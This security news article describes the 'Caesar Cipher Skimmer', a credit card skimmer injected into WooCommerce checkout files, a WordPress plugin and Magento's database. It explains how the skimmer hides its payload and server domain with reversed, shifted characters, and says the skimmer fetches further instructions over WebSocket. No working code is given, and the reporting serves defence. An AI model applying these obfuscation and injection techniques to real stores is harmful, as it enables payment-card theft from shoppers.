Researchers identified a new variant of credit card skimming attack, the Caesar Cipher Skimmer, targeting multiple content management systems (CMS), including WordPress, Magento, and OpenCart.
The skimmer specifically targets the checkout process, injecting malicious code into the checkout PHP file, as the attack leverages obfuscated strings and a Caesar Cipher technique to hide its malicious payload, which is a significant finding as it’s uncommon for new skimmers to be deployed across various platforms simultaneously.
A client reported credit card theft on their WooCommerce checkout page, where an investigation revealed malware injected into the form-checkout.php script, a common target in 2023, according to a recent threat report, which plays a vital role in WooCommerce checkout, making it an effective way for attackers to steal credit card information.
In recent gtag skimmer injections, attackers are using a Caesar Cipher technique to obfuscate malicious code, which involves splitting the code string into individual characters, reversing the order, and then subtracting a specific value (e.g., 3) from each character’s unicode value.
.webp)
The altered character codes are converted back to characters and rejoined into a string, which makes the script appear less suspicious at first glance, but the use of String.fromCharCode and the presence of jumbled characters can still be red flags for security experts.
The provided obfuscated strings are first joined and separated into individual characters, which are then reversed, while Unicode, a character encoding standard, assigns a numerical value to each character.
Then, the str_rot13 function uses the Caesar Cipher, a straightforward encryption method that shifts each character’s value by a fixed amount.
.webp)
Malware authors are using the Caesar Cipher technique to obfuscate the malicious payload domain by subtracting the value of 3 from each Unicode character of the domain URL, which makes it difficult to detect the malicious domain antivirus software and security vendors.
The malware then connects to a remote server via WebSocket to receive further instructions.
Some versions of the malware can even identify logged-in WordPress users and modify the skimmer behavior accordingly. Code comments within the malware script suggest that the developers are Russian-speaking.
.webp)
According to Sucuri, malware targeting e-commerce platforms has been found on WordPress, Magento, and Opencart.
Attackers exploit vulnerabilities in WooCommerce’s form-checkout.php file and the Insert Headers and Footers WPCode plugin on WordPress sites.
For Magento, they target the core_config_data table, where custom code stores credit card skimming JavaScript, while the OpenCart infection hasn’t been observed yet, but the location of the malware is under investigation.